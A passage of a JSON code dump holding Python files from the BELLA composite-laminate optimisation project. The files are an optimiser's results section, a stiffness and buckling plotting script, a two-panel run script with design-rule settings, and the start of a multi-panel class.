obj_constraints > 1e-10).any():\r\n print('obj_constraints_test', obj_constraints_test)\r\n print('obj_constraints', obj_constraints)\r\n pass\r\n raise Exception(\"\"\"\r\nObjective function value not matching the stacking sequences.\"\"\")\r\n\r\n\r\n ### calculates penalties for all panels\r\n\r\n # theses penalties are not used in caculations, just used to show the\r\n # degrees of feasibility of the designed laminates in the result report\r\n\r\n # balance\r\n penalty_bal_ipo = calc_penalty_ipo(lampam)\r\n\r\n # out-of-plane orthotropy\r\n penalty_oopo = calc_penalty_oopo_ss(lampam, constraints=constraints)\r\n\r\n # penalty_spacing\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=pdl_final[index],\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n# =============================================================================\r\n# return the results\r\n# =============================================================================\r\n results.ss = extend_after_guide_based_blending(multipanel, ss)\r\n results.lampam = extend_after_guide_based_blending(multipanel, lampam)\r\n results.n_plies_per_angle = extend_after_guide_based_blending(\r\n multipanel, n_plies_per_angle)\r\n results.n_obj_func_calls = n_obj_func_calls\r\n results.obj_constraints = obj_constraints\r\n results.obj_no_constraints = extend_after_guide_based_blending(\r\n multipanel, obj_no_constraints)\r\n results.penalty_diso = extend_after_guide_based_blending(\r\n multipanel, penalty_diso)\r\n results.penalty_contig = extend_after_guide_based_blending(\r\n multipanel, penalty_contig)\r\n results.penalty_10 = extend_after_guide_based_blending(\r\n multipanel, penalty_10)\r\n results.penalty_bal_ipo = extend_after_guide_based_blending(\r\n multipanel, penalty_bal_ipo)\r\n results.penalty_oopo = extend_after_guide_based_blending(\r\n multipanel, penalty_oopo)\r\n results.penalty_spacing = penalty_spacing\r\n results.n_diso = extend_after_guide_based_blending(multipanel, n_diso)\r\n results.n_contig = extend_after_guide_based_blending(multipanel, n_contig)\r\n results.sst = extend_after_guide_based_blending(\r\n multipanel, sst_final[index])\r\n results.pdl = extend_after_guide_based_blending(\r\n multipanel, pdl_final[index])\r\n return results\r\n"
},
{
"alpha_fraction": 0.5174461603164673,
"alphanum_fraction": 0.5755382180213928,
"avg_line_length": 30.263473510742188,
"blob_id": "8d470ee9922a793e2bb874f633b60ca676e682bc",
"content_id": "a2cace82fa44eacb66f21b0c831dcebb3a7bd5e5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5388,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 167,
"path": "/src/divers/plot_for_CDT_presentation.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nscipt to prepare plots for CDT presentation\r\nApril 2019\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nsys.path.append(r'C:\\BELLA')\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as ticker\r\n\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.CLA.ABD import D_from_lampam\r\nfrom src.BELLA.materials import Material\r\nfrom src.buckling.buckling import buckling_factor\r\n\r\n#==============================================================================\r\n# Material properties\r\n#==============================================================================\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n\r\nmat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n#==============================================================================\r\n# Stacking sequences\r\n#==============================================================================\r\nn_values = 100\r\n\r\ntheta = np.linspace(-90, 90, n_values, endpoint=True)\r\n\r\nlampam = np.zeros((n_values, 12), float)\r\nD11 = np.zeros((n_values,), float)\r\nD22 = np.zeros((n_values,), float)\r\nD12 = np.zeros((n_values,), float)\r\nD66 = np.zeros((n_values,), float)\r\nbuck = np.zeros((n_values,), float)\r\n\r\nfor index in range(n_values):\r\n ss = np.zeros((1,), float)\r\n ss[0] = theta[index]\r\n lampam[index] = calc_lampam(ss)\r\n D = D_from_lampam(lampam[index], mat)\r\n D11[index] = D[0, 0]\r\n D22[index] = D[1, 1]\r\n D12[index] = D[0, 1]\r\n D66[index] = D[2, 2]\r\n buck[index] = buckling_factor(lampam[index],\r\n mat,\r\n n_plies = 1,\r\n N_x= 10,\r\n N_y= 10,\r\n length_x=0.1,\r\n length_y=0.1)\r\n\r\nfig, ax = plt.subplots(1,1, sharex=True, figsize=(8,5.8))\r\n# sharex=True to align x-axes of the graphs\r\n# figsize size of the combines sub-plots\r\nmy_labelsize = 20\r\nmy_titlesize = 40\r\nmy_axissize = 26\r\nmy_font = 'Arial'\r\n# color of line of the graphs, boxes\r\nax.spines['bottom'].set_color('black')\r\nax.spines['top'].set_color('white')\r\nax.spines['right'].set_color('white')\r\nax.spines['left'].set_color('black')\r\n# set the ticks\r\nax.tick_params(\r\n direction='out',\r\n length = 0, width = 4,\r\n colors = 'black',\r\n labelsize = my_labelsize)\r\nax.yaxis.set_ticks([0,00, 0.04, 0.08])\r\n# plot\r\nax.plot(theta, D11, 'b-')\r\n# set axes' labels\r\nax.set_ylabel(\r\n r'$\\mathrm{Flexural\\ stiffnesses\\ [Pa.m^{-3}]}$',\r\n fontweight=\"normal\",\r\n fontsize = my_axissize,\r\n fontname=my_font)\r\nax.plot(theta, D22, 'g-')\r\nax.yaxis.set_ticks([0,00, 0.04, 0.08])\r\nax.plot(theta, D12 + 2*D66, 'r-')\r\nax.set_xlabel(\r\n r'$\\mathrm{Fibre\\ orientation\\ \\theta\\ [^{\\circ}]}$',\r\n fontsize =my_axissize,\r\n fontname=my_font)\r\nax.yaxis.set_ticks([0,00, 0.02, 0.04, 0.06, 0.08])\r\nax.xaxis.set_major_formatter(ticker.FormatStrFormatter('%1.0f'))\r\nax.xaxis.set_ticks([-90, -75,-60, -45, -30, -15, 0, 15, 30, 45, 60, 75, 90])\r\n# format labels\r\nax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%1.2f'))\r\n# white background\r\nax.set_facecolor((1, 1, 1))\r\n# labels fonts\r\nlabels = ax.get_xticklabels() + ax.get_yticklabels()\r\n[label.set_fontname(my_font) for label in labels]\r\n# axes' ranges\r\nax.set_xlim([-90, 90]) #ax.set_ylim([-1, 1])\r\n# grid\r\nax.grid(False)\r\n# aspect ratio ??\r\nax.set_aspect('auto')\r\n# padding when several subplots\r\nplt.tight_layout(pad=1, w_pad=1, h_pad=3)\r\n# legends\r\nax.legend((r'$\\mathrm{D_{11}}$',\r\n r'$\\mathrm{D_{22}}$',\r\n r'$\\mathrm{D_{12} + 2*D_{66}}$'),\r\n handletextpad=0,\r\n loc='right',\r\n fontsize =my_labelsize)\r\n# padding for the labels\r\nax.tick_params(pad = 10)\r\n# ???\r\n#plt.tight_layout(pad=20, w_pad=20, h_pad=20)\r\n# save image\r\nplt.savefig('plot_Ds.svg')\r\n\r\nfig, ax = plt.subplots(1,1, sharex=True, figsize=(9,3))\r\nmy_labelsize = 20\r\nmy_titlesize = 40\r\nmy_axissize = 26\r\nmy_font = 'Arial'\r\nax.spines['bottom'].set_color('black')\r\nax.spines['top'].set_color('white')\r\nax.spines['right'].set_color('white')\r\nax.spines['left'].set_color('black')\r\nax.tick_params(direction='out',\r\n length = 0, width = 4,\r\n colors = 'black', labelsize = my_labelsize,\r\n pad = 10)\r\nax.plot(theta, buck)\r\nax.set_xlabel(\r\n r'$\\mathrm{\\theta}$',\r\n fontsize =my_axissize,\r\n fontname=my_font) # X label\r\nax.set_ylabel(\r\n r'$\\mathrm{Buckling\\ \\ factors}$', fontweight=\"normal\",\r\n fontsize = my_axissize,\r\n fontname=my_font) # Y label\r\nax.yaxis.set_ticks([4, 5, 6, 7, 8, 9])\r\nax.xaxis.set_major_formatter(ticker.FormatStrFormatter('%1.0f'))\r\nax.xaxis.set_ticks([-90, -75,-60, -45, -30, -15, 0, 15, 30, 45, 60, 75, 90])\r\nax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%1.0f'))\r\nax.set_facecolor((1, 1, 1))\r\nlabels = ax.get_xticklabels() + ax.get_yticklabels()\r\n[label.set_fontname(my_font) for label in labels]\r\nax.set_xlim([-90, 90])\r\nax.grid(False)\r\nplt.savefig('plot_buck.svg')\r\n"
},
{
"alpha_fraction": 0.6198435425758362,
"alphanum_fraction": 0.6578947305679321,
"avg_line_length": 33.82590103149414,
"blob_id": "74ad399f44d70a648934f8188be031bbb4b2706f",
"content_id": "46d42464713955a7e6f9991245dabaf24661fe80",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16872,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 471,
"path": "/run_BELLA_2_panels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript to retrieve a blended multi-panel layout based on:\r\n - a panel thickness distribution\r\n - set of lamination parameter targets for each panel\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport time\r\nimport numpy as np\r\nimport random\r\n\r\nrandom.seed(10)\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.optimiser import BELLA_optimiser\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.CLA.lampam_functions import calc_lampam_2\r\nfrom src.divers.excel import delete_file\r\nfrom src.divers.pretty_print import print_list_ss\r\n\r\nfilename = 'BELLA-2-panels-test.xlsx'\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename)\r\n\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n\r\n### Targets and panel geometries ----------------------------------------------\r\n\r\n# panel IDs\r\nID = [1, 2]\r\n\r\n# number of panels\r\nn_panels = len(ID)\r\n\r\n# panels adjacency\r\nneighbour_panels = {1:[2], 2:[1]}\r\n\r\n# boundary weights\r\nboundary_weights = {(1, 2) : 1}\r\n\r\n# panel length in the x-direction\r\nlength_x = [1] *n_panels\r\n\r\n# panel length in the y-direction\r\nlength_y = [1] *n_panels\r\n\r\n# panel loading per unit width in the x-direction\r\nN_x = [1] *n_panels\r\n\r\n# panel loading per unit width in the y-direction\r\nN_y = [1] *n_panels\r\n\r\n# panel target stacking sequences\r\nsst_target = np.array([\r\n 45, 0, -45, 0, 0, 45, 0, 0, 45, 90, 90, -45, -45, 0, ], dtype=int)\r\nsst_target = np.array([\r\n 0, 0, 0, 0, 0, 0, 0, 0, ], dtype=int)\r\nsst_target = np.hstack((sst_target, np.flip(sst_target)))\r\nsst_target = np.vstack((sst_target, np.copy(sst_target), np.copy(sst_target)))\r\nsst_target[1:, 3] = -1\r\nsst_target[1:, 6] = -1\r\n# sst_target[1:, 9] = -1\r\nsst_target[1:, -4] = -1\r\nsst_target[1:, -7] = -1\r\n# sst_target[1:, -10] = -1\r\n# sst_target[2:, 4] = -1\r\n# sst_target[2:, 10] = -1\r\n# sst_target[2:, -5] = -1\r\n# sst_target[2:, -11] = -1\r\n\r\nss_target = convert_sst_to_ss(sst_target)\r\n\r\n# panel number of plies\r\nn_plies = [stack.size for stack in ss_target]\r\n\r\n# panel amination parameters targets\r\nlampam_targets = [\r\n calc_lampam_2(ss_target[ind_panel]) for ind_panel in range(n_panels)]\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\n# constraints_set == 'C0' ->\r\n# - ply-drop spacing rule enforced with a minimum of\r\n# constraints.min_drop plies between ply drops at panel boundaries\r\n# - covering rule enforced by preventing the drop of the\r\n# constraints.n_covering outermost plies on each laminate surface\r\n# - symmetry rule enforced, no other lay-up rules\r\n#\r\n# constraints_set == 'C1' ->\r\n# - ply-drop spacing rule enforced with a minimum of\r\n# constraints.min_drop plies between ply drops at panel boundaries\r\n# - covering enforrced by preventing the drop of the\r\n# constraints.n_covering outermost plies on each laminate surface\r\n# - symmetry rule enforced\r\n# - 10% rule enforced\r\n# if rule_10_Abdalla == True rule applied by restricting LPs instead of\r\n# ply percentages and percent_Abdalla is the percentage limit of the\r\n# rule\r\n# otherwise:\r\n# if combined_45_135 == True the restrictions are:\r\n# - a maximum percentage of constraints.percent_0 0 deg plies\r\n# - a maximum percentage of constraints.percent_90 90 deg plies\r\n# - a maximum percentage of constraints.percent_45_135 +-45 deg plies\r\n# if combined_45_135 == False the restrictions are:\r\n# - a maximum percentage of constraints.percent_0 0 deg plies\r\n# - a maximum percentage of constraints.percent_90 90 deg plies\r\n# - a maximum percentage of constraints.percent_45 45 deg plies\r\n# - a maximum percentage of constraints.percent_135 -45 deg plies\r\n# - disorientation rule enforced with variation of fibre angle between\r\n# adacent plies limited to a maximum value of constraints.delta_angle\r\n# degrees\r\n# - contiguity rule enforced with no more than constraints.n_contig\r\n# adajacent plies with same fibre angle\r\n# - damage tolerance rule enforced\r\n# if constraints.dam_tol_rule == 1 the restrictions are:\r\n# - one outer ply at + or -45 deg at the laminate surfaces\r\n# (2 plies intotal)\r\n# if constraints.dam_tol_rule == 2 the restrictions are:\r\n# - [+45, -45] or [-45, +45] at the laminate surfaces\r\n# (4 plies in total)\r\n# if constraints.dam_tol_rule == 3 the restrictions are:\r\n# - [+45,-45] [-45,+45] [+45,+45] or [-45,-45] at the laminate\r\n# surfaces (4 plies in total)\r\n# - out-of-plane orthotropy rule enforced to have small absolutes values\r\n# of LP_11 and LP_12 such that the values of D16 and D26 are small too\r\n\r\n## lay-up rules\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\n#set_of_angles = np.array([-45, 0, 45, 90, +30, -30, +60, -60], dtype=int)\r\n\r\nsym = True # symmetry rule\r\noopo = False # out-of-plane orthotropy requirements\r\n\r\nif constraints_set == 'C0':\r\n bal = False # balance rule\r\n rule_10_percent = False # 10% rule\r\n diso = False # disorientation rule\r\n contig = False # contiguity rule\r\n dam_tol = False # damage-tolerance rule\r\nelse:\r\n bal = True\r\n rule_10_percent = True\r\n diso = True\r\n contig = True\r\n dam_tol = True\r\n\r\nrule_10_Abdalla = False # 10% rule restricting LPs instead of ply percentages\r\npercent_Abdalla = 0 # percentage limit for the 10% rule applied on LPs\r\ncombine_45_135 = True # True if restriction on +-45 plies combined for 10% rule\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 =10 # percentage used in the 10% rule for +-45 deg plies\r\ndelta_angle = 45 # maximum angle difference for adjacent plies\r\nn_contig = 5 # maximum number of adjacent plies with the same fibre orientation\r\ndam_tol_rule = 1 # type of damage tolerance rule\r\n\r\n## ply-drop rules\r\n\r\ncovering = True # covering rule\r\nn_covering = 1 # number of plies ruled by covering rule at laminate surfaces\r\npdl_spacing = True # ply drop spacing rule\r\nmin_drop = 2 # Minimum number of continuous plies between ply drops\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n\r\nmat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\n# Lamination-parameter weightings in panel objective functions\r\n# (In practice these weightings can be different for each panel)\r\noptimisation_type = 'AD'\r\nif optimisation_type == 'A':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nelif optimisation_type == 'D':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nelif optimisation_type == 'AD':\r\n if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n# Weightings of the panels in the multi-panel objecive function\r\npanel_weightings = np.ones((n_panels,), float)\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Optimiser ----------------------------------------------------------------\r\n\r\n## For step 2 of BELLA\r\n\r\n# Number of initial ply drops to be tested\r\nn_ini_ply_drops = 1\r\n# Minimum ply count for ply groups during ply drop layout generation\r\ngroup_size_min = 4\r\n# Desired ply count for ply groups during ply drop layout generation\r\ngroup_size_max = 12\r\n# Time limit to create a group ply-drop layout\r\ntime_limit_group_pdl = 1\r\n# Time limit to create a ply-drop layout\r\ntime_limit_all_pdls = 10\r\n\r\n## For step 3 of BELLA\r\n\r\n# Branching limit for global pruning\r\nglobal_node_limit = 3\r\n# Branching limit for local pruning\r\nlocal_node_limit = 3\r\n# Branching limit for global pruning at the last level \r\nglobal_node_limit_final = 1\r\n# Branching limit for local pruning at the last level \r\nlocal_node_limit_final = 1\r\n\r\n## For step 4.1 of BELLA\r\n\r\n# to save repair success rates\r\nsave_success_rate = True\r\n# Thickness of the reference panels\r\nn_plies_ref_panel = 1\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = False\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = False\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n## For step 4.2 of BELLA\r\n\r\n# Branching limit for global pruning during ply drop layout optimisation\r\nglobal_node_limit2 = 1\r\n# Branching limit for local pruning during ply drop layout optimisation\r\nlocal_node_limit2 = 1\r\n\r\n## For step 4.3 of BELLA\r\n\r\n# Branching limit for global pruning during ply drop layout optimisation\r\nglobal_node_limit3 = 1\r\n# Branching limit for local pruning during ply drop layout optimisation\r\nlocal_node_limit3 = 1\r\n\r\nparameters = Parameters(\r\n constraints=constraints,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n n_ini_ply_drops=n_ini_ply_drops,\r\n global_node_limit=global_node_limit,\r\n global_node_limit_final=global_node_limit_final,\r\n local_node_limit=local_node_limit,\r\n local_node_limit_final=local_node_limit_final,\r\n global_node_limit2=global_node_limit2,\r\n local_node_limit2=local_node_limit2,\r\n global_node_limit3=global_node_limit3,\r\n local_node_limit3=local_node_limit3,\r\n save_success_rate=save_success_rate,\r\n p_A=p_A,\r\n n_D1=n_D1,\r\n n_D2=n_D2,\r\n n_D3=n_D3,\r\n repair_membrane_switch=repair_membrane_switch,\r\n repair_flexural_switch=repair_flexural_switch,\r\n n_plies_ref_panel=n_plies_ref_panel,\r\n time_limit_group_pdl=time_limit_group_pdl,\r\n time_limit_all_pdls=time_limit_all_pdls)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n lampam_target=lampam_targets[ind_panel],\r\n lampam_weightings=lampam_weightings,\r\n n_plies=n_plies[ind_panel],\r\n length_x=length_x[ind_panel],\r\n length_y=length_y[ind_panel],\r\n N_x=N_x[ind_panel],\r\n N_y=N_y[ind_panel],\r\n weighting=panel_weightings[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n\r\n\r\nmultipanel = MultiPanel(panels, boundary_weights)\r\n\r\n### Optimiser Run -------------------------------------------------------------\r\n\r\nt = time.time()\r\nresult = BELLA_optimiser(multipanel, parameters, obj_func_param, constraints,\r\n filename, mat)\r\nelapsed = time.time() - t\r\n\r\n### Display results -----------------------------------------------------------\r\n\r\n# solution stacking sequences (list of arrays)\r\nss = result.ss\r\n# solution stacking sequence table (array)\r\nsst = result.sst\r\n# solution lamination parameters (array)\r\nlampam = result.lampam\r\n# objective function value of the solution with constraint\r\n# penalties\r\nobj_constraints = result.obj_constraints\r\n# objective function value of the solution with no constraint\r\n# penalties\r\nobj_no_constraints = result.obj_no_constraints\r\n# objective function values with no constraint\r\n#penalties\r\nobj_no_constraints_tab = result.obj_no_constraints_tab\r\n# objective function values with constraint\r\n# penalties\r\nobj_constraints_tab = result.obj_constraints_tab\r\n# number of calls of the objective functions\r\nn_obj_func_calls_tab = result.n_obj_func_calls_tab\r\n# penalty for the disorientation constraint\r\npenalty_diso_tab = result.penalty_diso_tab\r\n# penalty for the contiguity constraint\r\npenalty_contig_tab = result.penalty_contig_tab\r\n# penalty for the 10% rule\r\npenalty_10_tab = result.penalty_10_tab\r\n# penalty for in-plane orthotropy\r\npenalty_bal_ipo_tab = result.penalty_bal_ipo_tab\r\n# penalty for out-of-plane orthotropy\r\npenalty_oopo_tab = result.penalty_oopo_tab\r\n# index for the outer loop with the best design\r\nind_mini = result.ind_mini\r\n# number of plies in each fibre direction for each panel\r\nn_plies_per_angle = result.n_plies_per_angle\r\n\r\nprint(r'\\\\\\\\\\\\\\ Final objective : ', obj_constraints)\r\nprint(r'\\\\\\\\\\\\\\ Elapsed time : ', elapsed, 's')\r\nprint(r'\\\\\\\\\\\\\\ objectives: ', obj_constraints_tab)\r\nprint(r'\\\\\\\\\\\\\\ Number of function evaluations')\r\nprint(n_obj_func_calls_tab)\r\nif constraints.rule_10_percent:\r\n print(r'\\\\\\\\\\\\\\ Penalties for the 10% rule')\r\n print(penalty_10_tab)\r\nif constraints.diso:\r\n print(r'\\\\\\\\\\\\\\ Penalties for disorientation')\r\n print(penalty_diso_tab)\r\nif constraints.contig:\r\n print(r'\\\\\\\\\\\\\\ Penalties for contiguity')\r\n print(penalty_contig_tab)\r\nif constraints.ipo:\r\n print(r'\\\\\\\\\\\\\\ Penalties for in-plane-orthotropy')\r\n print(penalty_bal_ipo_tab)\r\nif constraints.oopo:\r\n print(r'\\\\\\\\\\\\\\ Penalties for out-of-plane-orthotropy')\r\n print(penalty_oopo_tab)\r\n\r\nprint('\\nRetrieved stacking sequences')\r\n# for ii, panel in enumerate(multipanel.panels):\r\n# print('panel', ii + 1)\r\n# print_ss(ss[ii])\r\n\r\n#print('lampam_Retrieved VS lampam_target & difference')\r\n#for ii, panel in enumerate(multipanel.panels):\r\n# print('panel', ii + 1)\r\n# print_lampam(lampam[ii], panel.lampam_target, diff=True)\r\n\r\n#for index, panel in enumerate(multipanel.panels):\r\n# print('panel', index + 1)\r\n# N15plus = sum(ss[index] == 15)\r\n# N15minus = sum(ss[index] == -15)\r\n# N30plus = sum(ss[index] == 30)\r\n# N30minus = sum(ss[index] == -30)\r\n# N45plus = sum(ss[index] == 45)\r\n# N45minus = sum(ss[index] == -45)\r\n# N60plus = sum(ss[index] == 60)\r\n# N60minus = sum(ss[index] == -60)\r\n# N75plus = sum(ss[index] == 15)\r\n# N75minus = sum(ss[index] == -15)\r\n # balance check\r\n# if N15plus != N15minus \\\r\n# or N30plus != N30minus \\\r\n# or N45plus != N45minus \\\r\n# or N60plus != N60minus \\\r\n# or N75plus != N75minus:\r\n# if N45plus != N45minus:\r\n# print('balance constraint not respected:')\r\n# print(f'N45 - N-45: {N45plus - N45minus}')\r\n\r\nprint_list_ss(ss)"
},
{
"alpha_fraction": 0.5576273202896118,
"alphanum_fraction": 0.5659433603286743,
"avg_line_length": 38.404197692871094,
"blob_id": "3718d1db222749e5fb43b334b73519fcb1abbea0",
"content_id": "0ba76b48f59fec9b86baa7c9ef482731c6587be4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15392,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 381,
"path": "/src/BELLA/multipanels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for a multi-panel structure\r\n\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.reduced_multipanels import ReducedMultiPanel\r\n\r\nclass MultiPanel():\r\n \"\"\"\r\n Class for multi-panel structures\r\n \"\"\"\r\n def __init__(self, panels, boundary_weights=None):\r\n \"\"\"Create object for storing multi-panel structures information\"\"\"\r\n\r\n # list of panels (classes)\r\n self.panels = panels\r\n if not isinstance(panels, list):\r\n raise MultiPanelDefinitionError(\r\n 'Attention, panels must be a list!')\r\n\r\n # total area of structure\r\n self.area = sum([el.area for el in panels])\r\n\r\n # total area for all patches\r\n self.area_patches = sum([el.area * el.n_plies for el in panels])\r\n\r\n # minimum ply count\r\n self.n_plies_min = min((el.n_plies for el in panels))\r\n\r\n # maximum ply count\r\n self.n_plies_max = max((el.n_plies for el in panels))\r\n self.is_thick_panels = [panel.n_plies == self.n_plies_max \\\r\n for panel in self.panels]\r\n\r\n # number of panels\r\n self.n_panels = len(panels)\r\n\r\n # number of plies in the laminates\r\n self.n_plies_in_panels = np.array([self.panels[ind_panel].n_plies \\\r\n for ind_panel in range(self.n_panels)])\r\n\r\n self.has_a_middle_ply()\r\n self.identify_one_thickest_panel()\r\n\r\n self.calc_panel_boundary_dict(panels, boundary_weights)\r\n\r\n def should_you_use_BELLA(self):\r\n \"\"\" Tells the user when using LAYLA is better than employing BELLA\r\n\r\n Displays a message when BELLA is employed to design a composite\r\n laminate structure with one panel to indicate that LAYLA is better\r\n suited for the task than BELLA.\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n\r\n if self.n_panels == 1:\r\n print(\"\"\"\r\nYou are using BELLA to design a composite laminate structure with one panel.\r\nLAYLA is better suited for this task than BELLA, please consider using LAYLA\r\ninstead of BELLA.\"\"\")\r\n\r\n def filter_target_lampams(self, constraints, obj_func_param):\r\n \"\"\"\r\n filters applied to the lamination parameters to account for orthotropy\r\n requirements\r\n \"\"\"\r\n for panel in self.panels:\r\n panel.filter_target_lampams(constraints, obj_func_param)\r\n\r\n def filter_lampam_weightings(self, constraints, obj_func_param):\r\n \"\"\"\r\n filter of the lamination-parameter weightings in the panel\r\n objective function to account for the design guidelines\r\n\r\n lampam_weightings_3: for blending steps 3 (contain penalty for\r\n out-of-plane orthotropy and may contain penalty for balance)\r\n lampam_weightings: for all other blending steps (contain penalty for\r\n out-of-plane orthotropy and does not contain penalty for balance)\r\n \"\"\"\r\n for panel in self.panels:\r\n panel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n def from_mp_to_blending_strip(self, constraints, n_plies_ref_panel=1):\r\n \"\"\"\r\n performs the blending step 2: maps the 